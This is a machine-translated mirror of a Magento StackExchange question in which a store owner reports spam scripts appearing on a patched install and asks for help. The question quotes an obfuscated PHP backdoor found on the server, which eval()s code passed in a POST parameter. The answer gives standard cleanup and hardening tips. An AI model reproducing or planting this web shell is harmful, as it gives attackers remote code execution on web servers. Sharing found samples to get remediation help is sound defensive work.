'CLEAN' MAGENTO INSTALL 1.9.0.1 (Parches instalados) Scripts de spam instalados?

magento.stackexchange https://magento.stackexchange.com/questions/108031

Pregunta

Tengo un par de webshops Magento.Y solo una tienda Magento sin extensiones y con todos los parches instalados tiene el problema que instala algunos scripts que envían SPAM.

algunos datos:

  • magento 1.9.0.1
  • Sin extensiones
  • tema verificado que recibe actualizaciones regulares
  • Tema infantil usado para poseer personalizaciones (solo CSS y Simple HTML)
  • parches todos instalados cuando sea necesario

Está instalado en un VPS en los centros.PHP-FPM 5.3 (5.6 como Segundo PHP) Exim + Mailgun usado para enviar correo.

Una muestra de lo que está instalado: 

<?php
$ugjr9="utrsoe_p";
$kzbf99 =$ugjr9[3]. $ugjr9[1]. $ugjr9[2]. $ugjr9[1]. $ugjr9[4]. $ugjr9[0]. $ugjr9[7]. $ugjr9[7]. $ugjr9[5]. $ugjr9[2];
$dmr4 = $kzbf99($ugjr9[6]. $ugjr9[7] . $ugjr9[4]. $ugjr9[3]. $ugjr9[1] );
if( isset (${$dmr4 }['qa04af1'])) {eval( ${ $dmr4 }['qa04af1' ]) ; }
?>

por favor ayuda

¿Fue útil?

Solución

Si es posible, intente identificar la causa raíz del problema (con WICH MALWARE, está infectado. ¿Es un Magento conocido?).

Recomendaría verificar cualquiera de sus archivos principales en su instalación de Magento se hayan modificado o verifique cualquier Scripts en su servidor que pueda estar causando el problema.

https://blog.amasty. Com / Freebie-Magento-Modified-Core-Files-Report-by-amasty /

Porque no está utilizando ninguna extensión, puede reemplazar todos los archivos principales con una nueva instalación para estar seguro.

También eche un vistazo a las siguientes sugerencias.

https:// www .linkedin.com / pulso / 20141210024646-1143212-22 Formas de formas a impermeable: su Magento-Security

  • Crear una ruta de administración personalizada
  • Elija un nombre de usuario y contraseña de administrador largo y complejo ( https://strongpasswordgenerator.com/ )
  • Nunca use su contraseña de administrador magento para cualquier otra cosa
  • Siempre use Secure FTP
  • Límite de acceso FTP sin garantía para evitar que los scripts desagradables destruyen Havoc
  • Cambia tus permisos de archivos
  • Lockdown Your Magento Connect Manager
Licenciado bajo: CC-BY-SA con atribución
No afiliado a magento.stackexchange
scroll top